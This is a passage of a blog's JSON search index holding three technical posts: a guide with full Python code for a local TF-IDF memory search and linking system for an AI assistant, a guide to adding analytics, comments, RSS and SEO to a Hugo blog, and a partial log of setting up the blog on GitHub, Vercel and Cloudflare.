manually\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eCons:\u003c/strong\u003e\u003c/p\u003e","title":"AI Memory Systems: File Storage vs. Vector Databases"},{"content":"The Problem My AI assistant (OpenClaw) had a memory problem. Every restart, it started fresh. While I was saving conversation history to files, this approach had serious limitations:\nKeyword matching fails: Searching for \u0026ldquo;blog RSS config\u0026rdquo; wouldn\u0026rsquo;t find content about \u0026ldquo;subscription optimization\u0026rdquo; No connections: The system couldn\u0026rsquo;t see that \u0026ldquo;RSS config\u0026rdquo; and \u0026ldquo;SEO optimization\u0026rdquo; were related Inefficient retrieval: Reading all files every time burned through tokens The solution? A vector database for semantic search and automatic relationship detection.\nVector Database Options Before building, I evaluated the landscape:\nOption Type Pros Cons Best For Chroma Local/Embedded Python-native, zero-config, easy integration Mediocre performance, simple features Prototyping, small datasets Qdrant Local/Cloud Rust-based, high performance, filtering support Requires separate deployment, more complex Medium scale, production Milvus Local/Cloud Feature-complete, distributed support Resource-heavy, complex setup Large scale, enterprise Pinecone Managed Cloud Zero maintenance, auto-scaling API key required, costs, data privacy concerns Quick starts, no-ops teams pgvector Postgres Plugin SQL integration, transaction support Requires PostgreSQL knowledge Existing PG infrastructure My Choice Given my constraints:\nPersonal project with \u0026lt;1000 memories No extra dependencies (pip can fail) Full local control (data privacy matters) I went with: Pure Python implementation (TF-IDF + Cosine Similarity)\nWhy:\n✅ Zero dependencies—standard library only ✅ Fully local—no cloud, no API keys ✅ Simple enough to read and modify ✅ Accurate enough for text memories System Architecture Three-Layer Memory Stack ┌─────────────────────────────────────────┐ │ Layer 3: Auto-Linking │ │ Entity extraction, co-occurrence, │ │ relationship graphs │ ├─────────────────────────────────────────┤ │ Layer 2: Vector Search │ │ TF-IDF, cosine similarity, │ │ semantic retrieval │ ├─────────────────────────────────────────┤ │ Layer 1: File Storage (Markdown) │ │ Daily logs, long-term memory, │ │ raw records │ └─────────────────────────────────────────┘ Data Flow User asks a question ↓ [Vector Search] finds relevant memory snippets ↓ [Auto-Linking] discovers related entities and context ↓ Combine insights → Generate response Implementation Project Structure mkdir -p ~/openclaw/workspace/memory cd ~/openclaw/workspace/memory The Vector Search Engine Create memory_search.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34; Lightweight Vector Memory Search TF-IDF + Cosine Similarity, zero dependencies \u0026#34;\u0026#34;\u0026#34; import os import json import math import re from collections import defaultdict, Counter from datetime import datetime class MemorySearch: def __init__(self, memory_dir=\u0026#34;/home/warwick/.openclaw/workspace/memory\u0026#34;): self.memory_dir = memory_dir self.index_file = os.path.join(memory_dir, \u0026#34;.vector_index.json\u0026#34;) self.documents = [] self.term_freq = {} self.doc_freq = defaultdict(int) self.idf = {} def _tokenize(self, text): \u0026#34;\u0026#34;\u0026#34;Simple tokenizer: Chinese characters + English words\u0026#34;\u0026#34;\u0026#34; text = re.sub(r\u0026#39;[^\\u4e00-\\u9fa5a-zA-Z0-9]\u0026#39;, \u0026#39; \u0026#39;, text) tokens = [] for char in text: if \u0026#39;\\u4e00\u0026#39; \u0026lt;= char \u0026lt;= \u0026#39;\\u9fa5\u0026#39;: tokens.append(char) # Chinese character elif char.isalnum(): tokens.append(char.lower()) # English/alphanumeric return tokens def _compute_tf(self, tokens): \u0026#34;\u0026#34;\u0026#34;Compute term frequencies\u0026#34;\u0026#34;\u0026#34; counter = Counter(tokens) total = len(tokens) return {term: count/total for term, count in counter.items()} def add_document(self, doc_id, content, metadata=None): \u0026#34;\u0026#34;\u0026#34;Add document to index\u0026#34;\u0026#34;\u0026#34; tokens = self._tokenize(content) tf = self._compute_tf(tokens) doc = { \u0026#34;id\u0026#34;: doc_id, \u0026#34;content\u0026#34;: content, \u0026#34;tf\u0026#34;: tf, \u0026#34;metadata\u0026#34;: metadata or {}, \u0026#34;added_at\u0026#34;: datetime.now().isoformat() } self.documents.append(doc) for term in set(tokens): self.doc_freq[term] += 1 def build_index(self): \u0026#34;\u0026#34;\u0026#34;Build the search index\u0026#34;\u0026#34;\u0026#34; N = len(self.documents) # Compute IDF for term, df in self.doc_freq.items(): self.idf[term] = math.log(N / (df + 1)) + 1 # Compute TF-IDF vectors for doc in self.documents: doc[\u0026#34;vector\u0026#34;] = {} for term, tf in doc[\u0026#34;tf\u0026#34;].items(): doc[\u0026#34;vector\u0026#34;][term] = tf * self.idf.get(term, 0) def _cosine_similarity(self, vec1, vec2): \u0026#34;\u0026#34;\u0026#34;Calculate cosine similarity between two vectors\u0026#34;\u0026#34;\u0026#34; terms = set(vec1.keys()) | set(vec2.keys()) dot_product = sum(vec1.get(t, 0) * vec2.get(t, 0) for t in terms) norm1 = math.sqrt(sum(v**2 for v in vec1.values())) norm2 = math.sqrt(sum(v**2 for v in vec2.values())) if norm1 == 0 or norm2 == 0: return 0 return dot_product / (norm1 * norm2) def search(self, query, top_k=5): \u0026#34;\u0026#34;\u0026#34;Semantic search\u0026#34;\u0026#34;\u0026#34; query_tokens = self._tokenize(query) query_tf = self._compute_tf(query_tokens) query_vec = {} for term, tf in query_tf.items(): query_vec[term] = tf * self.idf.get(term, 0) results = [] for doc in self.documents: score = self._cosine_similarity(query_vec, doc.get(\u0026#34;vector\u0026#34;, {})) if score \u0026gt; 0: results.append({ \u0026#34;id\u0026#34;: doc[\u0026#34;id\u0026#34;], \u0026#34;content\u0026#34;: doc[\u0026#34;content\u0026#34;][:200] + \u0026#34;...\u0026#34; if len(doc[\u0026#34;content\u0026#34;]) \u0026gt; 200 else doc[\u0026#34;content\u0026#34;], \u0026#34;score\u0026#34;: round(score, 4), \u0026#34;metadata\u0026#34;: doc[\u0026#34;metadata\u0026#34;] }) results.sort(key=lambda x: x[\u0026#34;score\u0026#34;], reverse=True) return results[:top_k] def index_memory_files(self): \u0026#34;\u0026#34;\u0026#34;Index all memory markdown files\u0026#34;\u0026#34;\u0026#34; import glob md_files = glob.glob(os.path.join(self.memory_dir, \u0026#34;*.md\u0026#34;)) for filepath in md_files: if os.path.basename(filepath).startswith(\u0026#34;.\u0026#34;): continue with open(filepath, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: content = f.read() sections = re.split(r\u0026#39;\\n##+\\s+\u0026#39;, content) for i, section in enumerate(sections): if section.strip(): doc_id = f\u0026#34;{os.path.basename(filepath)}#{i}\u0026#34; date_match = re.search(r\u0026#39;(\\d{4}-\\d{2}-\\d{2})\u0026#39;, filepath) metadata = {\u0026#34;date\u0026#34;: date_match.group(1) if date_match else None} self.add_document(doc_id, section, metadata) self.build_index() print(f\u0026#34;✅ Indexed {len(self.documents)} document chunks\u0026#34;) def save_index(self): \u0026#34;\u0026#34;\u0026#34;Save index to disk\u0026#34;\u0026#34;\u0026#34; data = { \u0026#34;documents\u0026#34;: [{k: v for k, v in doc.items() if k != \u0026#34;vector\u0026#34;} for doc in self.documents], \u0026#34;idf\u0026#34;: self.idf, \u0026#34;doc_freq\u0026#34;: dict(self.doc_freq) } with open(self.index_file, \u0026#39;w\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: json.dump(data, f, ensure_ascii=False, indent=2) def load_index(self): \u0026#34;\u0026#34;\u0026#34;Load index from disk\u0026#34;\u0026#34;\u0026#34; if not os.path.exists(self.index_file): return False with open(self.index_file, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: data = json.load(f) self.documents = data.get(\u0026#34;documents\u0026#34;, []) self.idf = data.get(\u0026#34;idf\u0026#34;, {}) self.doc_freq = defaultdict(int, data.get(\u0026#34;doc_freq\u0026#34;, {})) for doc in self.documents: doc[\u0026#34;vector\u0026#34;] = {} for term, tf in doc.get(\u0026#34;tf\u0026#34;, {}).items(): doc[\u0026#34;vector\u0026#34;][term] = tf * self.idf.get(term, 0) return True def main(): import sys searcher = MemorySearch() if not searcher.load_index(): print(\u0026#34;🔄 First run, building index...\u0026#34;) searcher.index_memory_files() searcher.save_index() else: print(f\u0026#34;✅ Loaded index: {len(searcher.documents)} documents\u0026#34;) if len(sys.argv) \u0026gt; 1: query = \u0026#34; \u0026#34;.join(sys.argv[1:]) print(f\u0026#34;\\n🔍 Searching: {query}\\n\u0026#34;) results = searcher.search(query, top_k=5) for i, r in enumerate(results, 1): print(f\u0026#34;{i}. [{r[\u0026#39;score\u0026#39;]}] {r[\u0026#39;id\u0026#39;]}\u0026#34;) print(f\u0026#34; {r[\u0026#39;content\u0026#39;][:150]}...\\n\u0026#34;) else: print(\u0026#34;\\n💡 Usage: python3 memory_search.py \u0026#39;your query\u0026#39;\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: main() Auto-Linking System Create memory_linker.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34; Memory Auto-Linking System Based on entity extraction + co-occurrence analysis \u0026#34;\u0026#34;\u0026#34; import os import json import re from collections import defaultdict from datetime import datetime class MemoryLinker: def __init__(self, memory_dir=\u0026#34;/home/warwick/.openclaw/workspace/memory\u0026#34;): self.memory_dir = memory_dir self.links_file = os.path.join(memory_dir, \u0026#34;.memory_links.json\u0026#34;) self.entities = defaultdict(set) self.documents = {} def _extract_entities(self, text): \u0026#34;\u0026#34;\u0026#34;Extract technical entities and terms\u0026#34;\u0026#34;\u0026#34; entities = set() # Technical patterns tech_patterns = [ r\u0026#39;\\b[A-Z][a-zA-Z0-9]*[A-Z][a-zA-Z0-9]*\\b\u0026#39;, # CamelCase r\u0026#39;`([^`]+)`\u0026#39;, # Inline code r\u0026#39;\\b([A-Z]{2,})\\b\u0026#39;, # Acronyms ] for pattern in tech_patterns: matches = re.findall(pattern, text) entities.update(matches) # Chinese technical terms cn_terms = re.findall(r\u0026#39;[\\u4e00-\\u9fa5]{2,6}(?:系统|框架|工具|配置|优化)\u0026#39;, text) entities.update(cn_terms) # URLs and paths urls = re.findall(r\u0026#39;https?://[^\\s]+|/[^\\s\\)]+\u0026#39;, text) entities.update(urls) return entities def _extract_tags(self, text): return set(re.findall(r\u0026#39;#([\\w\\u4e00-\\u9fa5]+)\u0026#39;, text)) def analyze_document(self, doc_id, content): entities = self._extract_entities(content) tags = self._extract_tags(content) self.documents[doc_id] = { \u0026#34;content\u0026#34;: content[:500], \u0026#34;entities\u0026#34;: list(entities), \u0026#34;tags\u0026#34;: list(tags), } for entity in entities: self.entities[entity].add(doc_id) for tag in tags: self.entities[f\u0026#34;#{tag}\u0026#34;].add(doc_id) def find_related(self, doc_id, top_k=5): if doc_id not in self.documents: return [] doc = self.documents[doc_id] doc_entities = set(doc[\u0026#34;entities\u0026#34;]) | set(f\u0026#34;#{t}\u0026#34; for t in doc[\u0026#34;tags\u0026#34;]) related_scores = defaultdict(int) for entity in doc_entities: for other_doc in self.entities[entity]: if other_doc != doc_id: related_scores[other_doc] += 1 results = [] for other_id, score in related_scores.items(): if other_id in self.documents: other_doc = self.documents[other_id] other_entities = set(other_doc[\u0026#34;entities\u0026#34;]) | set(f\u0026#34;#{t}\u0026#34; for t in other_doc[\u0026#34;tags\u0026#34;]) union = len(doc_entities | other_entities) similarity = score / union if union \u0026gt; 0 else 0 shared = doc_entities \u0026amp; other_entities results.append({ \u0026#34;id\u0026#34;: other_id, \u0026#34;score\u0026#34;: round(similarity, 4), \u0026#34;shared_entities\u0026#34;: list(shared)[:5], \u0026#34;preview\u0026#34;: other_doc[\u0026#34;content\u0026#34;][:100] + \u0026#34;...\u0026#34; }) results.sort(key=lambda x: x[\u0026#34;score\u0026#34;], reverse=True) return results[:top_k] def build_links(self): import glob md_files = glob.glob(os.path.join(self.memory_dir, \u0026#34;*.md\u0026#34;)) for filepath in md_files: if os.path.basename(filepath).startswith(\u0026#34;.\u0026#34;): continue with open(filepath, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: content = f.read() sections = re.split(r\u0026#39;\\n##+\\s+\u0026#39;, content) for i, section in enumerate(sections): if section.strip() and len(section) \u0026gt; 50: doc_id = f\u0026#34;{os.path.basename(filepath)}#{i}\u0026#34; self.analyze_document(doc_id, section) print(f\u0026#34;✅ Analyzed {len(self.documents)} document chunks\u0026#34;) print(f\u0026#34;✅ Extracted {len(self.entities)} entities\u0026#34;) strong_links = [] for entity, docs in self.entities.items(): if len(docs) \u0026gt;= 2 and not entity.startswith(\u0026#39;#\u0026#39;): strong_links.append({ \u0026#34;entity\u0026#34;: entity, \u0026#34;doc_count\u0026#34;: len(docs), \u0026#34;docs\u0026#34;: list(docs)[:5] }) strong_links.sort(key=lambda x: x[\u0026#34;doc_count\u0026#34;], reverse=True) return strong_links[:20] def save_links(self): data = { \u0026#34;documents\u0026#34;: self.documents, \u0026#34;entities\u0026#34;: {k: list(v) for k, v in self.entities.items()}, \u0026#34;built_at\u0026#34;: datetime.now().isoformat() } with open(self.links_file, \u0026#39;w\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: json.dump(data, f, ensure_ascii=False, indent=2) def load_links(self): if not os.path.exists(self.links_file): return False with open(self.links_file, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: data = json.load(f) self.documents = data.get(\u0026#34;documents\u0026#34;, {}) self.entities = defaultdict(set, {k: set(v) for k, v in data.get(\u0026#34;entities\u0026#34;, {}).items()}) return True def show_entity_graph(self, entity): if entity not in self.entities: print(f\u0026#34;❌ Entity not found: {entity}\u0026#34;) return docs = self.entities[entity] print(f\u0026#34;\\n🔗 Entity \u0026#39;{entity}\u0026#39; relationship graph\u0026#34;) print(f\u0026#34; Appears in {len(docs)} documents:\\n\u0026#34;) for doc_id in list(docs)[:10]: if doc_id in self.documents: preview = self.documents[doc_id][\u0026#34;content\u0026#34;][:80] print(f\u0026#34; • {doc_id}\u0026#34;) print(f\u0026#34; {preview}...\\n\u0026#34;) def main(): import sys linker = MemoryLinker() if len(sys.argv) \u0026gt; 1: cmd = sys.argv[1] if cmd == \u0026#34;build\u0026#34;: print(\u0026#34;🔄 Building memory link graph...\\n\u0026#34;) core_links = linker.build_links() linker.save_links() print(\u0026#34;\\n📊 Core linked entities:\u0026#34;) for i, link in enumerate(core_links[:10], 1): print(f\u0026#34;{i}. {link[\u0026#39;entity\u0026#39;]} - appears in {link[\u0026#39;doc_count\u0026#39;]} documents\u0026#34;) elif cmd == \u0026#34;related\u0026#34; and len(sys.argv) \u0026gt; 2: doc_id = sys.argv[2] if not linker.load_links(): print(\u0026#34;❌ No link data found. Run \u0026#39;build\u0026#39; first.\u0026#34;) return print(f\u0026#34;\\n🔍 Memories related to \u0026#39;{doc_id}\u0026#39;:\\n\u0026#34;) related = linker.find_related(doc_id, top_k=5) for i, r in enumerate(related, 1): print(f\u0026#34;{i}. [{r[\u0026#39;score\u0026#39;]}] {r[\u0026#39;id\u0026#39;]}\u0026#34;) print(f\u0026#34; Shared: {\u0026#39;, \u0026#39;.join(r[\u0026#39;shared_entities\u0026#39;])}\u0026#34;) print(f\u0026#34; {r[\u0026#39;preview\u0026#39;]}\\n\u0026#34;) elif cmd == \u0026#34;entity\u0026#34; and len(sys.argv) \u0026gt; 2: entity = sys.argv[2] if not linker.load_links(): print(\u0026#34;❌ No link data found. Run \u0026#39;build\u0026#39; first.\u0026#34;) return linker.show_entity_graph(entity) if __name__ == \u0026#34;__main__\u0026#34;: main() Shell Scripts search.sh:\n#!/bin/bash cd \u0026#34;$(dirname \u0026#34;$0\u0026#34;)\u0026#34; python3 memory_search.py \u0026#34;$@\u0026#34; link.sh:\n#!/bin/bash cd \u0026#34;$(dirname \u0026#34;$0\u0026#34;)\u0026#34; python3 memory_linker.py \u0026#34;$@\u0026#34; reindex.sh:\n#!/bin/bash cd \u0026#34;$(dirname \u0026#34;$0\u0026#34;)\u0026#34; if [ -f \u0026#34;.vector_index.json\u0026#34; ]; then mv .vector_index.json \u0026#34;.vector_index.json.backup.$(date +%Y%m%d%H%M%S)\u0026#34; fi python3 -c \u0026#34; import sys sys.path.insert(0, \u0026#39;.\u0026#39;) from memory_search import MemorySearch searcher = MemorySearch() searcher.index_memory_files() searcher.save_index() print(\u0026#39;✅ Index rebuilt!\u0026#39;) \u0026#34; Make executable:\nchmod +x search.sh link.sh reindex.sh Usage Examples Semantic Search ./search.sh \u0026#34;blog RSS configuration\u0026#34; 🔍 Search results: 1. [0.4534] 2026-02-19.md#4 Blog optimization article covers RSS feeds... 2. [0.2983] 2026-02-20.md#6 RSS configuration improvements added... Build Link Graph ./link.sh build 📊 Core linked entities: 1. API - appears in 12 documents 2. GSC - appears in 5 documents 3. OpenClaw - appears in 5 documents 4. RSS - appears in 3 documents Find Related Memories ./link.sh related \u0026#34;2026-02-20.md#5\u0026#34; 🔍 Related memories: 1. [0.25] 2026-02-19.md#17 Shared: Twitter, multi-platform Future plans - WeChat, Toutiao, Xiaohongshu... View Entity Graph ./link.sh entity \u0026#34;OpenClaw\u0026#34; 🔗 Entity \u0026#39;OpenClaw\u0026#39; relationship graph: Appears in 5 documents: • 2026-02-19.md#16 Zhihu article published successfully... • 2026-02-19.md#9 OpenClaw update notes... Performance On my setup (54 memory files, ~500KB text):\nOperation Time Memory Build index ~2s ~50MB Search ~50ms Negligible Load index ~100ms ~30MB More than fast enough for personal use.\nFuture Upgrades 1. Migrate to Professional Vector DB When you hit 1000+ memories, move to Chroma or Qdrant:\nimport chromadb client = chromadb.PersistentClient(path=\u0026#34;./chroma_db\u0026#34;) collection = client.get_or_create_collection(\u0026#34;memory\u0026#34;) collection.add( documents=[\u0026#34;memory content\u0026#34;], ids=[\u0026#34;doc_id\u0026#34;], metadatas=[{\u0026#34;date\u0026#34;: \u0026#34;2026-02-20\u0026#34;}] ) results = collection.query( query_texts=[\u0026#34;search query\u0026#34;], n_results=5 ) 2. Add Embedding Model For better semantic understanding:\nfrom sentence_transformers import SentenceTransformer model = SentenceTransformer(\u0026#39;paraphrase-multilingual-MiniLM-L12-v2\u0026#39;) embeddings = model.encode([\u0026#34;search query\u0026#34;]) 3. Integrate into AI Startup # Load on startup searcher = MemorySearch() searcher.load_index() # Search before generating relevant = searcher.search(user_query, top_k=3) context = \u0026#34;\\n\u0026#34;.join([r[\u0026#34;content\u0026#34;] for r in relevant]) # Include in prompt prompt = f\u0026#34;Based on memory:\\n{context}\\n\\nUser: {user_query}\u0026#34; Summary Using pure Python, we built a complete vector memory system with zero dependencies:\n✅ Semantic search – No more keyword matching, understands intent\n✅ Auto-linking – Discovers hidden connections between memories\n✅ Lightweight – Single-file executable, no external deps\n✅ Extensible – Clean code, easy to upgrade\nPerfect for:\nPersonal AI assistant projects Privacy-conscious setups (fully local) Quick prototypes without infrastructure Learning vector search fundamentals The code above is complete and copy-paste ready. Save and run immediately!\nReferences:\nTF-IDF on Wikipedia Cosine Similarity ChromaDB Qdrant ","permalink":"https://www.d5n.xyz/en/posts/ai-memory-vector-db-guide/","summary":"\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eMy AI assistant (OpenClaw) had a memory problem. Every restart, it started fresh. While I was saving conversation history to files, this approach had serious limitations:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eKeyword matching fails\u003c/strong\u003e: Searching for \u0026ldquo;blog RSS config\u0026rdquo; wouldn\u0026rsquo;t find content about \u0026ldquo;subscription optimization\u0026rdquo;\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo connections\u003c/strong\u003e: The system couldn\u0026rsquo;t see that \u0026ldquo;RSS config\u0026rdquo; and \u0026ldquo;SEO optimization\u0026rdquo; were related\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInefficient retrieval\u003c/strong\u003e: Reading all files every time burned through tokens\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eThe solution? \u003cstrong\u003eA vector database\u003c/strong\u003e for semantic search and automatic relationship detection.\u003c/p\u003e","title":"Building an AI Memory System: A Lightweight Vector Database Guide"},{"content":"Why This Matters You have a working Hugo blog. Great. But a modern blog needs more than just content—it needs to understand its audience, enable discussion, and be discoverable. This guide covers four essential upgrades that transform a basic blog into a professional platform:\nAnalytics – Understand who\u0026rsquo;s reading what Comments – Let readers engage with your content RSS – Enable subscriptions for your regulars SEO – Make sure search engines can find you The best part? All of these are free, open-source, and require zero backend infrastructure.\nGoogle Analytics 4: Know Your Audience The Setup Create a property at Google Analytics Select \u0026ldquo;Web\u0026rdquo; as your platform Copy your Measurement ID (looks like G-XXXXXXXXXX) Hugo Integration PaperMod has built-in GA4 support. Just add this to hugo.toml:\n[params] [params.analytics.google] measurementID = \u0026#39;G-XXXXXXXXXX\u0026#39; # Replace with your ID Verification Deploy your site, then:\nOpen DevTools → Network tab Refresh the page Filter for collect requests You should see GA4 calls firing That\u0026rsquo;s it. You\u0026rsquo;ll start seeing data in GA4 within 24 hours.\nGiscus Comments: Let Readers Talk Back Why Giscus? Most comment systems (Disqus, Facebook) are bloated with tracking and ads. Giscus is different:\nUses GitHub Discussions as the backend (free, reliable) No ads, no tracking Supports Markdown Lightweight and fast Prerequisites Your blog repo must be public on GitHub Enable Discussions: Settings → Features → Discussions Configuration Head to giscus.app and fill in:\nSetting Value Repository username/repo-name Mapping pathname (creates one discussion per page) Category General (or create a dedicated one) Theme preferred_color_scheme (auto light/dark) Language en Copy the generated values into hugo.toml:\ncomments = true [params.giscus] repo = \u0026#34;username/repo-name\u0026#34; repoID = \u0026#34;R_xxxxxxxxxx\u0026#34; category = \u0026#34;General\u0026#34; categoryID = \u0026#34;DIC_xxxxxxxxxx\u0026#34; mapping = \u0026#34;pathname\u0026#34; reactionsEnabled = \u0026#34;1\u0026#34; emitMetadata = \u0026#34;0\u0026#34; inputPosition = \u0026#34;bottom\u0026#34; theme = \u0026#34;preferred_color_scheme\u0026#34; lang = \u0026#34;en\u0026#34; loading = \u0026#34;lazy\u0026#34; Per-Post Control Not every post needs comments. Disable on a per-post basis:\n--- title: \u0026#34;Some Post\u0026#34; comments: false --- RSS Feeds: The Subscription Economy RSS isn\u0026rsquo;t dead—it\u0026rsquo;s just become invisible. Every serious reader uses it, and Hugo makes it trivial to support.\nEnabling RSS Add to hugo.toml:\n[outputs] home = [\u0026#34;HTML\u0026#34;, \u0026#34;RSS\u0026#34;, \u0026#34;JSON\u0026#34;] section = [\u0026#34;HTML\u0026#34;, \u0026#34;RSS\u0026#34;] [outputFormats] [outputFormats.RSS] mediatype = \u0026#34;application/rss\u0026#34; baseName = \u0026#34;index\u0026#34; Feed Locations Once deployed, your feeds are available at:\nSite-wide: /index.xml By category: /categories/name/index.xml By tag: /tags/name/index.xml PaperMod automatically adds the RSS link to your site\u0026rsquo;s \u0026lt;head\u0026gt;, so browsers and feed readers can auto-discover it.\nSEO: Getting Found on Google Sitemap Generation Hugo can auto-generate sitemaps. Configure it:\n[sitemap] changefreq = \u0026#39;weekly\u0026#39; filename = \u0026#39;sitemap.xml\u0026#39; priority = 0.5 enableRobotsTXT = true The Domain Consistency Trap Here\u0026rsquo;s where most people trip up. If your site redirects example.com to www.example.com, you must be consistent:\n1. Use the canonical domain in baseURL:\nbaseURL = \u0026#39;https://www.example.com\u0026#39; # Use the final domain 2. Create static/robots.txt:\nUser-agent: * Allow: / Sitemap: https://www.example.com/sitemap.xml 3. Submit the right property to Google Search Console: If your sitemap uses www, your GSC property must also use www.\nSubmitting to Google Go to Google Search Console Add your property (domain or URL prefix) Verify ownership (DNS verification is most reliable) Submit sitemap.xml under \u0026ldquo;Sitemaps\u0026rdquo; Common Issues Symptom Cause Fix \u0026ldquo;Couldn\u0026rsquo;t fetch\u0026rdquo; Domain mismatch Use consistent www/non-www \u0026ldquo;Invalid URL\u0026rdquo; Wrong baseURL Check hugo.toml Stale content CDN caching Purge Cloudflare/Vercel cache Complete Configuration Here\u0026rsquo;s a complete, production-ready hugo.toml:\nbaseURL = \u0026#39;https://www.example.com\u0026#39; languageCode = \u0026#39;en-US\u0026#39; title = \u0026#39;Your Blog\u0026#39; theme = \u0026#39;PaperMod\u0026#39; [params] author = \u0026#39;Your Name\u0026#39; description = \u0026#39;Your blog description\u0026#39; ShowReadingTime = true ShowPostNavLinks = true ShowBreadCrumbs = true ShowCodeCopyButtons = true ShowToc = true comments = true # Analytics [params.analytics.google] measurementID = \u0026#39;G-XXXXXXXXXX\u0026#39; # Comments [params.giscus] repo = \u0026#34;username/repo\u0026#34; repoID = \u0026#34;R_xxxxxxxxx\u0026#34; category = \u0026#34;General\u0026#34; categoryID = \u0026#34;DIC_xxxxxxxx\u0026#34; mapping = \u0026#34;pathname\u0026#34; reactionsEnabled = \u0026#34;1\u0026#34; emitMetadata = \u0026#34;0\u0026#34; inputPosition = \u0026#34;bottom\u0026#34; theme = \u0026#34;preferred_color_scheme\u0026#34; lang = \u0026#34;en\u0026#34; loading = \u0026#34;lazy\u0026#34; # RSS [outputs] home = [\u0026#34;HTML\u0026#34;, \u0026#34;RSS\u0026#34;, \u0026#34;JSON\u0026#34;] section = [\u0026#34;HTML\u0026#34;, \u0026#34;RSS\u0026#34;] [outputFormats] [outputFormats.RSS] mediatype = \u0026#34;application/rss\u0026#34; baseName = \u0026#34;index\u0026#34; # SEO [sitemap] changefreq = \u0026#39;weekly\u0026#39; filename = \u0026#39;sitemap.xml\u0026#39; priority = 0.5 enableRobotsTXT = true Deployment Checklist git add hugo.toml static/robots.txt git commit -m \u0026#34;Add analytics, comments, RSS, and SEO\u0026#34; git push Then verify:\nGA4 shows real-time visitors Giscus loads on posts /index.xml returns valid RSS /sitemap.xml URLs match your domain GSC successfully fetches the sitemap What You Now Have A blog that:\n📊 Tracks visitor behavior (GA4) 💬 Engages readers (Giscus) 📡 Distributes via RSS 🔍 Ranks on search engines (SEO) All without spending a dime on infrastructure.\nResources Hugo Documentation PaperMod Wiki Giscus Google Search Console ","permalink":"https://www.d5n.xyz/en/posts/hugo-blog-optimization/","summary":"\u003ch2 id=\"why-this-matters\"\u003eWhy This Matters\u003c/h2\u003e\n\u003cp\u003eYou have a working Hugo blog. Great. But a modern blog needs more than just content—it needs to understand its audience, enable discussion, and be discoverable. This guide covers four essential upgrades that transform a basic blog into a professional platform:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAnalytics\u003c/strong\u003e – Understand who\u0026rsquo;s reading what\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eComments\u003c/strong\u003e – Let readers engage with your content\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRSS\u003c/strong\u003e – Enable subscriptions for your regulars\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSEO\u003c/strong\u003e – Make sure search engines can find you\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eThe best part? All of these are free, open-source, and require zero backend infrastructure.\u003c/p\u003e","title":"Level Up Your Hugo Blog: Adding Analytics, Comments, RSS, and SEO"},{"content":"Introduction Today I spent about 8 hours building this blog from scratch. This post documents the complete process, including technology choices, pitfalls encountered, and their solutions. Hope this helps anyone looking to build their own blog.\nTech Stack Overview Hugo - Static Site Generator Hugo is a static site generator written in Go, marketed as \u0026ldquo;the world\u0026rsquo;s fastest static site generator.\u0026rdquo;\nPros:\n⚡ Lightning-fast builds (thousands of pages per second) 🎨 Rich theme ecosystem (300+ official themes) 📝 Native Markdown support 🔧 Single binary deployment Cons:\nTheme versions may be incompatible with Hugo versions Learning curve involved GitHub - Code Hosting GitHub hosts the blog source code with Git version control.\nFunctions:\nCode version management Markdown file storage Automatic deployment integration with Vercel Vercel - Static Site Hosting Vercel is a frontend deployment platform with excellent static site support.\nPros:\n🚀 Automatic deployment (deploy on every push) 🌍 Global CDN acceleration 🆓 Free tier sufficient for personal blogs 🔒 Automatic HTTPS Notes:\nDeployment Protection may be enabled by default (needs to be disabled for public access) Hugo version environment variable needs to be configured correctly Cloudflare - DNS + CDN Cloudflare provides DNS resolution and CDN acceleration.\nFunctions:\nDomain DNS management SSL/TLS certificates (automatic) DDoS protection Global CDN acceleration Step-by-Step Setup Step 1: Domain Purchase I chose d5n.xyz - Duran (5 letters) + N.\nTips:\n3-letter .com domains are mostly premium ($1000+) .xyz is cheap for the first year ($1-3), but check renewal prices Cloudflare offers domain registration at cost (no markup) Step 2: Initialize Hugo Site hugo new site duranblog cd duranblog git init git submodule add --depth=1 https://github.com/adityatelange/hugo-PaperMod.git themes/PaperMod Configure hugo.toml:\nbaseURL = \u0026#39;https://d5n.xyz\u0026#39; languageCode = \u0026#39;zh-CN\u0026#39; title = \u0026#39;D5N\u0026#39; theme = \u0026#39;PaperMod\u0026#39; Step 3: Create GitHub Repository Repository name: duranblog Type: Public (Vercel free tier has no limits for public repos) Initialize with README Step 4: Push Code to GitHub Issue 1: Git Authentication Failure\nError:\nfatal: could not read Username for \u0026#39;https://github.com\u0026#39; Solution: Use Personal Access Token authentication:\ngit remote set-url origin https://openduran:TOKEN@github.com/openduran/duranblog.git Step 5: Vercel Deployment Issue 2: Raw HTML Source Displayed Symptom: Browser shows raw HTML code instead of rendered webpage.\nInvestigation:\nChecked GitHub repo, found public/ directory was committed Vercel has auto-build; no need to commit built files Remove public/ and add .gitignore Solution:\nrm -rf public/ echo \u0026#34;public/\u0026#34; \u0026gt;\u0026gt; .gitignore git add . \u0026amp;\u0026amp; git commit -m \u0026#34;Remove public dir\u0026#34; \u0026amp;\u0026amp; git push Issue 3: Hugo Version Incompatibility Error:\nWARN Module \u0026#34;PaperMod\u0026#34; is not compatible with this Hugo version: Min 0.146.0 ERROR render of \u0026#34;/404\u0026#34; failed Cause: Vercel\u0026rsquo;s default Hugo version is too old; PaperMod requires 0.146.0+\nSolution: Add environment variable in Vercel project settings:\nName: HUGO_VERSION Value: 0.146.5 Issue 4: Login Required (401 Error) Symptom: Website shows 